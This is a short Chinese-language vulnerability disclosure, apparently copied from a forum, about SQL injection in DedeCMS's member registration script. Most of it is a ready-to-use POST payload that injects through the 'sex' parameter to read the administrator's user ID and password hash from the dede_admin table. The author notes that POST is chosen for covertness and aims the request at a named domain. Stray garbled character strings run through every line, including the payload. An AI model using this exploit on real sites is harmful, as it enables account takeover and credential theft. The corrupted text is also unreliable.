漏洞类型: SQL注射漏洞0 j: F5 |# \. W5 v" | b' W/ s
简要描述:/ M4 |( l: ], h: ]3 d, C* Q
0 y. U" i3 Z, X( b9 ^+ S' i7 \
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.' Y ]% n1 B. r9 ^
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码./ B+ O6 }/ B; P {
详细说明:跟这个漏洞/ A0 a+ k8 q7 O# l7 l
! S' c( {6 a# J9 ]: D/ OWooYun: Dedecms SQL注射导致审核机制绕过漏洞
# }0 S* P& ?- `是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.$ d' |' R9 S6 D" T5 A2 }- ~
POST提交以下数据,其实不用POST提交的,这样隐蔽点.5 s1 p3 O' M" h( A# D( A
/ k+ Q& N Z" Cwww.political-security.com/member/reg_new.php- u6 e9 A/ R. C- l& n8 T
- N; W$ j2 h$ d$ u% F5 qPOST
i8 P" F' [* f
2 u: K; H5 J$ B0 fdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
D9 a% \/ z4 cuserid=c4rp3nt3r&uname=c4rp3nt3r
9 I% A/ m5 x# Z! ]&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
4 l4 I7 v+ |& h) X h2 P' p8 G&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,, q6 h v: Q0 v! [0 \; V& p
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
* |# |* Z4 \: G% O%00&vdcode=glos&agree= |